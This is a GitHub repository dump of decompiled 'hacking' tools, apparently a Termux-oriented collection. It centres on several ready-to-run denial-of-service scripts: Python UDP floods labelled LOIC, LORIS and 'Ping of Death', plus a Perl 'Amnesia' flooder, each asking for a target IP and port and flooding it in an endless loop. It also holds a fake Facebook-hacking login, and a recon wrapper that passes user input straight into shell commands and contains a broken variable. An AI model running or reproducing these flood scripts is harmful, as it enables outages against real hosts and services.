├── Ddos404
├── Hi
├── README.md
├── xmas_dec.py
├── hackfb2019_dec.py
├── Amnesia.py
├── LO1C_dec.py
├── lor_dec.py
├── ufosyn_dec.py
├── smurf_dec.py
├── ddos.sh
├── andromeda_dec.py
├── win.32.64.Nt_dec.py
└── Botnet_dec.py
├── roc-x
├── hi
├── README.md
├── ms_opt_dec.py
├── bdsms.py
├── emailtool_dec.py
├── a1.py
├── t_dec.py
├── kali2.py
└── ddos_dec.py
├── All Cloning Tool
├── hi
├── x4web_dec.py
├── bhot_dec.py
├── bat_dec.py
├── W-Login_dec.py
├── famous_dec.py
├── mr-unknown_dec .py
└── boss_dec.py
├── X4 Not found
├── hi
├── enpy-base32_dec.py
├── enpy-base64_dec.py
└── encrypt_base16_dec.py
├── Black Mafia
├── hi
├── all in one main_dec.py
├── Gmail attack_dec.py
├── comile_dec.py
└── time pass_dec.py
├── Nabill-Official
├── Abir
└── a.py
└── README.md
/Ddos404/Hi:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/roc-x/hi:
--------------------------------------------------------------------------------
1 | boys
2 |
--------------------------------------------------------------------------------
/All Cloning Tool/hi:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Ddos404/README.md:
--------------------------------------------------------------------------------
1 | # Ddos404
--------------------------------------------------------------------------------
/X4 Not found/hi:
--------------------------------------------------------------------------------
1 | zhhsbbs
2 |
--------------------------------------------------------------------------------
/Black Mafia/hi:
--------------------------------------------------------------------------------
1 | Darkxploit
2 |
--------------------------------------------------------------------------------
/Nabill-Official/Abir:
--------------------------------------------------------------------------------
1 | Bznsnns
2 |
--------------------------------------------------------------------------------
/Black Mafia/all in one main_dec.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/darkhunter141/Reverse-Engineering/HEAD/Black Mafia/all in one main_dec.py
--------------------------------------------------------------------------------
/roc-x/README.md:
--------------------------------------------------------------------------------
1 | Commands For First Time:
2 |
3 | pkg update -y && pkg upgrade -y
4 |
5 | pkg install python -y
6 |
7 | pkg install git -y
8 |
9 | git clone https://github.com/RootOfCyber/roc-x
10 |
11 | Commands For All Time:
12 |
13 | cd roc-x
14 |
15 | python main.py .
16 |
17 | . . . . . .
18 |
19 | We Are On :
20 |
21 | Youtube:
22 |
23 | https://www.youtube.com/c/RootOfCyber
24 |
25 | Facebook:
26 |
27 | https://www.facebook.com/RootOfCyber
28 |
29 | What's app:
30 |
31 | https://chat.whatsapp.com/JPTOWlsJhhgEVtzht4tAlr
32 |
33 | Telegram:
34 |
35 | https://t.me/joinchat/JruEd1OzoFJDq9fBlh-Jkg
36 |
37 | Contact Us:
38 |
39 | rootofcyber@gmail.com
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Reverse--Engineering
2 | 💁
3 |
4 |
5 |
If you see this and you copy it, give me credit😶
6 |
7 | 🖥️ Contact Info
8 | Our Facebook Page
9 | Our Facebook Community
10 | Our Youtube Channel
11 | Our Blogsite
12 |
13 |
14 | 🤠 Devolopers :
15 | Ashrafi Abir (DarkXploit)
16 | Tanvir Mahamud Shariful (DarkWlof)
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Ddos404/xmas_dec.py:
--------------------------------------------------------------------------------
1 | # uncompyle6 version 3.7.4
2 | # Python bytecode 2.7
3 | # Decompiled from: Python 2.7.18 (default, Mar 20 2021, 14:58:25)
4 | # [GCC 4.2.1 Compatible Android (6454773 based on r365631c2) Clang 9.0.8 (https:/
5 | # Embedded file name:
6 | import sys, os, time, socket, random
7 | from datetime import datetime
8 | now = datetime.now()
9 | hour = now.hour
10 | minute = now.minute
11 | day = now.day
12 | month = now.month
13 | year = now.year
14 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
15 | bytes = random._urandom(1490)
16 | os.system('clear')
17 | os.system('figlet POD')
18 | print
19 | print '\x1b[32;1m<=======================================>'
20 | print '\x1b[34;1m||========>PING OF DEADHT<=========||'
21 | print '\x1b[32;1m<=======================================>'
22 | print 'RECODE=Mrlinkerrorsystem'
23 | print
24 | ip = raw_input('MASUKAN IP TAGET ===> ')
25 | port = input('Port ===> ')
26 | os.system('clear')
27 | os.system('figlet Loading..')
28 | print 'membutuhkan waktu 5 detik'
29 | time.sleep(5)
30 | sent = 0
31 | while True:
32 | sock.sendto(bytes, (ip, port))
33 | sent = sent + 1000000000
34 | port = port + 0
35 | print '\x1b[31;1mMengirim %s packet ke %s throught port:%s' % (sent, ip, port)
36 | if port == 65534:
37 | port = 0
--------------------------------------------------------------------------------
/Ddos404/hackfb2019_dec.py:
--------------------------------------------------------------------------------
1 | # uncompyle6 version 3.7.4
2 | # Python bytecode 2.7
3 | # Decompiled from: Python 2.7.18 (default, Mar 20 2021, 14:58:25)
4 | # [GCC 4.2.1 Compatible Android (6454773 based on r365631c2) Clang 9.0.8 (https:/
5 | # Embedded file name:
6 | import os, sys
7 | print "\n SELAMAT DATANG\n DI\n TOOLS MRLINKERRORSYSTEM\n CODE: BY MRLINKERRORSYSTEM\n FACEBOOK HACKING SYSTEM FAST CRACK \n _____ _ _\n| ___|_ _ ___ ___| |__ ___ ___ | | __\n| |_ / _` |/ __/ _ \\ '_ \\ / _ \\ / _ \\| |/ /\n| _| (_| | (_| __/ |_) | (_) | (_) | <\n|_| \\__,_|\\___\\___|_.__/ \\___/ \\___/|_|\\_\\ "
8 | print '\x1b[1;33mSudah punya ID dan Password nya?'
9 | print '\x1b[1;32mSilahkan Login '
10 | import os, sys
11 |
12 | def wa():
13 | os.system('xdg-open https://api.whatsapp.com/send?phone=6281249281196&text=Assalamualaikum')
14 |
15 |
16 | def restart():
17 | ngulang = sys.executable
18 | os.execl(ngulang, ngulang, *sys.argv)
19 |
20 |
21 | user = raw_input('ID: ')
22 | import getpass
23 | sandi = raw_input('Password: ')
24 | if sandi == 'ganteng' and user == 'Mrlink':
25 | print 'Kamu Telah Login System Saya'
26 | sys.exit
27 | else:
28 | print 'Login GAGAL, Silahkan hubungi Saya'
29 | wa()
30 | restart()
--------------------------------------------------------------------------------
/All Cloning Tool/x4web_dec.py:
--------------------------------------------------------------------------------
1 | from os import system as oss
2 | import sys
3 | import time
4 | def logo():
5 | oss('toilet -f mono12 -F gay "X4WEB"')
6 | logo()
7 | head = """Author : Rakib Hossain
8 |
9 | Github : https://www.github.com/teamx4ck
10 |
11 | Facebook : X4ck cyber army
12 |
13 | Fb page : Team X4CK
14 | """
15 | print(head)
16 | time.sleep(0.5)
17 | def opt():
18 | print('[1] Whois Scan')
19 | print('[2] NSLookup')
20 | print('[3] Nmap')
21 | print('[4] Page link dump')
22 | print('[5] Join Facebook')
23 | print('[6] More Tools')
24 | print('[0] Exit')
25 | opt()
26 | print()
27 | opt = int(input('Enter your option : '))
28 | if opt==1:
29 | oss('clear')
30 | logo()
31 | whurl = str(input('Enter domain name : '))
32 | print('Please wait.....')
33 | time.sleep(0.5)
34 | oss('whois '+whurl)
35 | input('Press enter.....')
36 | oss('python x4web.py')
37 | elif opt==2:
38 | oss('clear')
39 | logo()
40 | nsurl = str(input('Enter domain name : '))
41 | oss('nslookup '+nsurl)
42 | input('Press Enter.....')
43 | oss('python x4web.py')
44 | elif opt==3:
45 | oss('clear')
46 | logo()
47 | nm = input('Enter ip : ')
48 | oss('nmap '+ip)
49 | input('Press enter......')
50 | oss('python x4web.py')
51 | elif opt==4:
52 | oss('clear')
53 | logo()
54 | pgurl = str(input('Enter url : '))
55 | oss('lynx -listonly -nonumbers -dump '+pgurl)
56 | input('Press enter......')
57 | oss('python x4web.py')
58 | elif opt==5:
59 | oss('xdg-open https://www.facebook.com/groups/x4ckcyberarmy/?ref=share')
60 | oss('python x4web.py')
61 | elif opt==6:
62 | oss('xdg-open https://www.github.com/teamx4ck')
63 | oss('python x4web.py')
64 | elif opt==0:
65 | print('Good day..')
66 | sys.exit()
67 | else:
68 | print('option not found...!')
69 | time.sleep(2)
70 | oss('python x4web.py')
71 |
--------------------------------------------------------------------------------
/Ddos404/Amnesia.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 |
3 | use IO::Socket;
4 |
5 | ###
6 | # Amnesia DDoS Script
7 | ###
8 | system("clear || cls");
9 | #It forgets...
10 | print q{
11 | (`-') _ <-. (`-') <-. (`-')_ (`-') _ (`-').-> _ (`-') _
12 | (OO ).-/ \(OO )_ \( OO) ) ( OO).-/ ( OO)_ (_) (OO ).-/
13 | / ,---. ,--./ ,-.),--./ ,--/ (,------.(_)--\_) ,-(`-')/ ,---.
14 | | \ /`.\ | `.' || \ | | | .---'/ _ / | ( OO)| \ /`.\
15 | '-'|_.' || |'.'| || . '| |)(| '--. \_..`--. | | )'-'|_.' |
16 | (| .-. || | | || |\ | | .--' .-._) \(| |_/(| .-. |
17 | | | | || | | || | \ | | `---.\ / | |'->| | | |
18 | `--' `--'`--' `--'`--' `--' `------' `-----' `--' `--' `--'
19 | print "\n------------------------------";
20 | print "\n The IP you want to hit with Amnesia:";
21 | chop ($host = );
22 | print "===============================";
23 | print "\n The Port that'll forget: ";
24 | chop ($port = );
25 | print "===============================";
26 | print "\n The Protocol (TCP or UDP):";
27 | chop ($proto = );
28 | system("clear || cls");
29 | print "\n[*][$host] Is being hit with Amnesia on port [$port] via proto => [$proto] Protocol\n\n";
30 | sleep 1;
31 |
32 | {
33 | $sock = IO::Socket::INET->new (
34 | PeerAddr => $host,
35 | PeerPort => $port,
36 | Proto => "$proto" ) || die "\n [$host] Will now forget";
37 |
38 |
39 | }
40 | packets:
41 | while (1) {
42 | $size = rand() * 8921811 * 99919998;
43 | print (" Packets sent: $size\n");
44 | send($sock, 999999999999999999999999999, $size);
45 | packets2:
46 | $size = rand() * 8921873 * 99919988 * 2;
47 | print "Forgetting:";
48 | send($sock, 999999999999999999999999999, $size);
49 | packet3:
50 | $size = rand() * 8921873 * 99919988 * 2 + 99919988;
51 | print " (=>$host:$port~$proto<=)";
52 | send($sock, $size, $size);
53 |
54 | }
55 |
56 |
57 |
58 |
59 |
60 |
--------------------------------------------------------------------------------
/Ddos404/LO1C_dec.py:
--------------------------------------------------------------------------------
1 | # uncompyle6 version 3.7.4
2 | # Python bytecode 2.7
3 | # Decompiled from: Python 2.7.18 (default, Mar 20 2021, 14:58:25)
4 | # [GCC 4.2.1 Compatible Android (6454773 based on r365631c2) Clang 9.0.8 (https:/
5 | # Embedded file name:
6 | import sys, os, time, socket, random
7 | from datetime import datetime
8 | now = datetime.now()
9 | hour = now.hour
10 | minute = now.minute
11 | day = now.day
12 | month = now.month
13 | year = now.year
14 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
15 | bytes = random._urandom(1490)
16 | os.system('clear')
17 | os.system('figlet LOIC')
18 | print
19 | print '\x1b[31;1m\n `/ymMMMMMMMMMMMMMMmy/`\n /hMMMMMMMMMMMMMMMMMMMMMMh/\n /mMMmNMMMMMNNNNNNNNMMMMMNNMMm/\n `hNmo:dMMNNNmNNmNNmNNmNNNMMd:omNh`\n .mh:+/hMNNNNmNNmNdhmmNNmNNNNMy/o:hm.\n `d+://sNmMMMmMMMmdy+/mMMMmMMMmNs///+d`\n ys.o/oMmNNNmNNMNNMmdMNNMNNmNNNmMo/o.ys\n`my.-/NmMMMMmMMNmNNyyNNmNMMmMMMMmN/:`ym`\n-h/+s/MmMMMNmNNNdym++mymNNNmNMMNmM:so/h-\n-N.o.sMmMMMNh/:-`-Mo\x1b[37;1msM-`-:/hNMMMmMs.+.N-\n`ho/-ohmMMMM/ -M/+M. /MMMMmho-/oh\n s+-s-odmNNN` /-:/ .NNNmd+:s-+s\n `mo/-:+ymMm mMms+:-/om`\n .h/+/y`hhs yyh`y/+/h.\n `hd/::-+. .+-::/dy`\n /hs+/::.-- --.::/+sh:\n :hds+/-` `-/+sdh:\n `/ymM+ oMmy/'
20 | print '\x1b[32;1m<=======================================>'
21 | print '\x1b[34;1m||========>LON ORBIT LOW CANON<=========||'
22 | print '\x1b[32;1m<=======================================>'
23 | print 'RECODE=Mrlinkerrorsystem'
24 | print
25 | ip = raw_input('MASUKAN IP TAGET ===> ')
26 | port = input('Port ===> ')
27 | os.system('clear')
28 | os.system('figlet Loading..')
29 | print 'membutuhkan waktu 5 detik'
30 | time.sleep(5)
31 | sent = 0
32 | while True:
33 | sock.sendto(bytes, (ip, port))
34 | sent = sent + 1000000000
35 | port = port + 0
36 | print '\x1b[32;1mMengirim %s packet ke %s throught port:%s' % (sent, ip, port)
37 | if port == 65534:
38 | port = 0
--------------------------------------------------------------------------------
/roc-x/ms_opt_dec.py:
--------------------------------------------------------------------------------
1 | import os,sys
2 | os.system("clear")
3 | import smtplib
4 | import time
5 |
6 |
7 | #CVALUE
8 | blue= '\33[94m'
9 | lightblue = '\033[94m'
10 | red = '\033[91m'
11 | white = '\33[97m'
12 | yellow = '\33[93m'
13 | green = '\033[1;32m'
14 | cyan = "\033[96m"
15 | end = '\033[0m'
16 | line=yellow+"======================================================================================================================"
17 | space=" "
18 | logo=red+str("""
19 | 8888888b. .d88888b. .d8888b. Y88b d88P
20 | 888 Y88b d88P" "Y88b d88P Y88b Y88b d88P
21 | 888 888 888 888 888 888 Y88o88P
22 | 888 d88P 888 888 888 888888 Y888P
23 | 8888888P" 888 888 888 888888 d888b
24 | 888 T88b 888 888 888 888 d88888b
25 | 888 T88b Y88b. .d88P Y88b d88P d88P Y88b
26 | 888 T88b "Y88888P" "Y8888P" d88P Y88b
27 | """)
28 |
29 |
30 | #HEADER
31 | text=cyan+"\t\tDeveloped By : Sanaur Asif"+green+"\n\n\t\t★★ ROC-X MetaSploit★★ \n"
32 | notice=""
33 | def header():
34 | print(logo)
35 | print(text)
36 | print(line)
37 | print(notice)
38 |
39 |
40 | header()
41 | print(cyan+"\n\t\t[•] Checking The Requirements")
42 | time.sleep(0.7)
43 | try:
44 | import time
45 | except:
46 | os.system("clear")
47 | header()
48 | print(cyan+"\n [°] Installing The Requirements. Allow Up to 10 minutes ")
49 | time.sleep(2)
50 | os.system("clear")
51 | notice=cyan+"\t\t[°] Installing The Requirements.. \n"
52 | header()
53 | notice=""
54 | print("\n")
55 | os.system("pip install ")
56 |
57 |
58 | os.system('clear')
59 | header()
60 | print(red+"\n\n [!] "+red+"NOTE : "+cyan+" You Have To Install Kali NetHunter in order to Run This Service\n "+red+"[!] "+cyan+"Otherwise, you will get an error while start it.\n\n")
61 | lastly=str(input(blue+" [>] Have You Installed Kali NetHunter ? [y/n] : "+yellow ))
62 | if lastly=="Y" or lastly=="y" or lastly=="yes" or lastly=="YES":
63 | os.system("python3 ms.py")
64 | else:
65 | os.system("python3 main2.py")
66 |
--------------------------------------------------------------------------------
/Ddos404/lor_dec.py:
--------------------------------------------------------------------------------
1 | # uncompyle6 version 3.7.4
2 | # Python bytecode 2.7
3 | # Decompiled from: Python 2.7.18 (default, Mar 20 2021, 14:58:25)
4 | # [GCC 4.2.1 Compatible Android (6454773 based on r365631c2) Clang 9.0.8 (https:/
5 | # Embedded file name:
6 | import sys, os, time, socket, random
7 | from datetime import datetime
8 | now = datetime.now()
9 | hour = now.hour
10 | minute = now.minute
11 | day = now.day
12 | month = now.month
13 | year = now.year
14 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
15 | bytes = random._urandom(1490)
16 | os.system('clear')
17 | os.system('figlet LORIS')
18 | print '\x1b[32;1m . .IIIII .II\n IIIIIIIIII. I II . II..IIII-V.1.5-IIIIIIIII\n . .IIIIII II IIIIIIIIIIIIIIIIIIIII I.\n .IIIII.IIIII IIIByIII-II+Errorsystem+III"\n .IIIIIIII II .IIIII IIIIIIIIIIII. I\n IIIIII IIII I III+DDOS+IIII I\n .II IIIIIIIIIIIII IIIIIIIII\n I. .II+ATTACK+II I II I\n .IIII IIIIIIIIIIII . I\n IIIII. IIIIII . I.\n +HACKING+ IIIII ..I II .\n IIIIIII IIII... IIII\n IIII III. I IIBPCII\n III I I III\n II I .\n I LORIS \n'
19 | print '\x1b[32;1m<=======================================>'
20 | print '\x1b[34;1m||========>LORIS<=========||'
21 | print '\x1b[32;1m<=======================================>'
22 | print 'RECODE=mrlinkerrorsystem'
23 | print
24 | ip = raw_input('MASUKAN IP TAGET ===> ')
25 | port = input('Port ===> ')
26 | os.system('clear')
27 | os.system('figlet Loading..')
28 | print 'membutuhkan waktu 5 detik'
29 | time.sleep(5)
30 | sent = 0
31 | while True:
32 | sock.sendto(bytes, (ip, port))
33 | sent = sent + 1000000000000000000L
34 | port = port + 0
35 | print '\x1b[32;1mMengirim %s packet ke %s throught port:%s' % (sent, ip, port)
36 | if port == 65534:
37 | port = 0
--------------------------------------------------------------------------------
/X4 Not found/enpy-base32_dec.py:
--------------------------------------------------------------------------------
1 | # Decompiled By DarkXploit
2 | # Author Team Dark Hunter 141
3 | # Github : https://github.com/darkhunter141
4 | # If If you see this and you copy it, give me credit# uncompyle6 version 3.7.4
5 | # Python bytecode 2.7
6 | # Decompiled from: Python 2.7.18 (default, Mar 20 2021, 14:58:25)
7 | # [GCC 4.2.1 Compatible Android (6454773 based on r365631c2) Clang 9.0.8 (https:/
8 | # Embedded file name: